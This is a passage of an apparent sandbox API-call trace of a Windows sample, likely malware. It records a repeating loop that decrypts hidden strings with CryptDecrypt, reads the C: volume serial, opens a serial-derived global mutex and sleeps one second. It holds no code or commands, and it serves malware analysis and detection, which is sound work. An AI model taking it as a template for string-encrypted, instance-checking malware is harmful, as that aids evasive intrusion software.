lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0039.789] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61280 | out: hHeap=0x2a60000) returned 1 [0039.789] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a61258 [0039.789] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf58ce8) returned 1 [0039.790] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0039.790] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298fa04 | out: pbData=0x2a61258, pdwDataLen=0x298fa04) returned 1 [0039.790] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0039.790] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61498 [0039.790] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2c0 [0039.790] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0039.790] CloseHandle (hObject=0x2c0) returned 1 [0039.790] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.790] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0039.790] Sleep (dwMilliseconds=0x3e8) [0040.873] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61258 [0040.873] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf58e28) returned 1 [0040.873] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0040.873] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298f9d0 | out: pbData=0x2a61258, pdwDataLen=0x298f9d0) returned 1 [0040.873] CryptDestroyKey (hKey=0xf58e28) returned 1 [0040.873] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61280 [0040.873] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61498 [0040.873] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a643e0 [0040.873] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf58e28) returned 1 [0040.873] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0040.873] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a643e0, pdwDataLen=0x298f9a8 | out: pbData=0x2a643e0, pdwDataLen=0x298f9a8) returned 1 [0040.873] CryptDestroyKey (hKey=0xf58e28) returned 1 [0040.873] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a643e0 | out: hHeap=0x2a60000) returned 1 [0040.873] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61280, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0040.873] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0040.874] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0040.874] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0040.874] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61280 | out: hHeap=0x2a60000) returned 1 [0040.874] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a61258 [0040.874] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf59228) returned 1 [0040.874] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0040.874] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298fa04 | out: pbData=0x2a61258, pdwDataLen=0x298fa04) returned 1 [0040.874] CryptDestroyKey (hKey=0xf59228) returned 1 [0040.874] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61498 [0040.874] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x298 [0040.874] WaitForSingleObject (hHandle=0x298, dwMilliseconds=0x0) returned 0x102 [0040.874] CloseHandle (hObject=0x298) returned 1 [0040.874] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0040.874] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0040.874] Sleep (dwMilliseconds=0x3e8) [0041.975] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61258 [0041.975] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf59228) returned 1 [0041.975] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0041.975] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298f9d0 | out: pbData=0x2a61258, pdwDataLen=0x298f9d0) returned 1 [0041.975] CryptDestroyKey (hKey=0xf59228) returned 1 [0041.975] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61280 [0041.975] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61498 [0041.975] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a643e0 [0041.975] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf58e68) returned 1 [0041.975] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0041.975] CryptDecrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a643e0, pdwDataLen=0x298f9a8 | out: pbData=0x2a643e0, pdwDataLen=0x298f9a8) returned 1 [0041.975] CryptDestroyKey (hKey=0xf58e68) returned 1 [0041.975] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a643e0 | out: hHeap=0x2a60000) returned 1 [0041.975] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61280, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0041.975] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0041.975] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0041.975] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0041.975] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61280 | out: hHeap=0x2a60000) returned 1 [0041.975] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a61258 [0041.975] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf58ce8) returned 1 [0041.975] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0041.975] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298fa04 | out: pbData=0x2a61258, pdwDataLen=0x298fa04) returned 1 [0041.976] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0041.976] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61498 [0041.976] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x298 [0041.976] WaitForSingleObject (hHandle=0x298, dwMilliseconds=0x0) returned 0x102 [0041.976] CloseHandle (hObject=0x298) returned 1 [0041.976] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0041.976] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0041.976] Sleep (dwMilliseconds=0x3e8) [0043.146] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61258 [0043.146] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf58e28) returned 1 [0043.146] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0043.146] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298f9d0 | out: pbData=0x2a61258, pdwDataLen=0x298f9d0) returned 1 [0043.146] CryptDestroyKey (hKey=0xf58e28) returned 1 [0043.146] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61280 [0043.146] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61498 [0043.146] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a643e0 [0043.146] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf590a8) returned 1 [0043.146] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0043.146] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a643e0, pdwDataLen=0x298f9a8 | out: pbData=0x2a643e0, pdwDataLen=0x298f9a8) returned 1 [0043.146] CryptDestroyKey (hKey=0xf590a8) returned 1 [0043.146] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a643e0 | out: hHeap=0x2a60000) returned 1 [0043.146] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61280, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0043.146] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0043.146] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0043.146] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0043.146] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61280 | out: hHeap=0x2a60000) returned 1 [0043.146] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a61258 [0043.146] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf58ea8) returned 1 [0043.146] CryptSetKeyParam (hKey=0xf58ea8, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0043.147] CryptDecrypt (in: hKey=0xf58ea8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298fa04 | out: pbData=0x2a61258, pdwDataLen=0x298fa04) returned 1 [0043.147] CryptDestroyKey (hKey=0xf58ea8) returned 1 [0043.147] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61498 [0043.147] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x298 [0043.147] WaitForSingleObject (hHandle=0x298, dwMilliseconds=0x0) returned 0x102 [0043.147] CloseHandle (hObject=0x298) returned 1 [0043.147] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0043.147] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0043.147] Sleep (dwMilliseconds=0x3e8) [0044.231] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61258 [0044.231] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf58ce8) returned 1 [0044.231] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0044.231] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298f9d0 | out: pbData=0x2a61258, pdwDataLen=0x298f9d0) returned 1 [0044.231] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.231] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61280 [0044.231] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61498 [0044.231] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a643e0 [0044.231] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf590a8) returned 1 [0044.231] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0044.231] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a643e0, pdwDataLen=0x298f9a8 | out: pbData=0x2a643e0, pdwDataLen=0x298f9a8) returned 1 [0044.231] CryptDestroyKey (hKey=0xf590a8) returned 1 [0044.231] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a643e0 | out: hHeap=0x2a60000) returned 1 [0044.231] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61280, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0044.231] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0044.231] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0044.231] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0044.232] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61280 | out: hHeap=0x2a60000) returned 1 [0044.232] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a61258 [0044.232] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf58e28) returned 1 [0044.232] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0044.232] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298fa04 | out: pbData=0x2a61258, pdwDataLen=0x298fa04) returned 1 [0044.232] CryptDestroyKey (hKey=0xf58e28) returned 1 [0044.232] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61498 [0044.232] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x298 [0044.232] WaitForSingleObject (hHandle=0x298, dwMilliseconds=0x0) returned 0x102 [0044.232] CloseHandle (hObject=0x298) returned 1 [0044.232] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0044.232] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0044.232] Sleep (dwMilliseconds=0x3e8) [0045.623] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x3c70088 [0045.623] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf59168) returned 1 [0045.623] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0045.623] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3c70088, pdwDataLen=0x298f9d0 | out: pbData=0x3c70088, pdwDataLen=0x298f9d0) returned 1 [0045.623] CryptDestroyKey (hKey=0xf59168) returned 1 [0045.623] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x3c700b0 [0045.623] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x3c700d8 [0045.624] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a67fd8 [0045.624] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf58ee8) returned 1 [0045.624] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0045.624] CryptDecrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a67fd8, pdwDataLen=0x298f9a8 | out: pbData=0x2a67fd8, pdwDataLen=0x298f9a8) returned 1 [0045.624] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.624] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a67fd8 | out: hHeap=0x2a60000) returned 1 [0045.624] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x3c700b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0045.624] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3c700d8 | out: hHeap=0x2a60000) returned 1 [0045.624] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3c70088 | out: hHeap=0x2a60000) returned 1 [0045.624] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0045.624] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3c700b0 | out: hHeap=0x2a60000) returned 1 [0045.624] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x3c70088 [0045.624] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf58ee8) returned 1 [0045.624] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0045.624] CryptDecrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3c70088, pdwDataLen=0x298fa04 | out: pbData=0x3c70088, pdwDataLen=0x298fa04) returned 1 [0045.624] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.624] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x3c700d0 [0045.624] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x310 [0045.624] WaitForSingleObject (hHandle=0x310, dwMilliseconds=0x0) returned 0x102 [0045.624] CloseHandle (hObject=0x310) returned 1 [0045.624] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3c70088 | out: hHeap=0x2a60000) returned 1 [0045.624] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3c700d0 | out: hHeap=0x2a60000) returned 1 [0045.624] Sleep (dwMilliseconds=0x3e8) [0046.830] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0047.236] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71b40) returned 1 [0047.238] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0047.239] CryptDecrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0047.241] CryptDestroyKey (hKey=0xf71b40) returned 1 [0047.242] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0047.248] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0047.250] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68238 [0047.251] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71cc0) returned 1 [0047.253] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0047.253] CryptDecrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68238, pdwDataLen=0x298f9a8 | out: pbData=0x2a68238, pdwDataLen=0x298f9a8) returned 1 [0047.256] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0047.256] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68238 | out: hHeap=0x2a60000) returned 1 [0047.258] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0047.258] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0047.258] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0047.259] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0047.265] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0047.267] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0047.267] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71b00) returned 1 [0047.269] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0047.271] CryptDecrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0047.272] CryptDestroyKey (hKey=0xf71b00) returned 1 [0047.274] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0047.274] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2e4 [0047.277] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0x0) returned 0x102 [0047.277] CloseHandle (hObject=0x2e4) returned 1 [0047.277] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0047.277] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0047.277] Sleep (dwMilliseconds=0x3e8) [0048.799] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0048.799] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71fc0) returned 1 [0048.799] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0048.799] CryptDecrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0048.799] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0048.799] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0048.799] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0048.799] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68958 [0048.799] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71fc0) returned 1 [0048.799] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0048.799] CryptDecrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68958, pdwDataLen=0x298f9a8 | out: pbData=0x2a68958, pdwDataLen=0x298f9a8) returned 1 [0048.799] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0048.799] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68958 | out: hHeap=0x2a60000) returned 1 [0048.799] 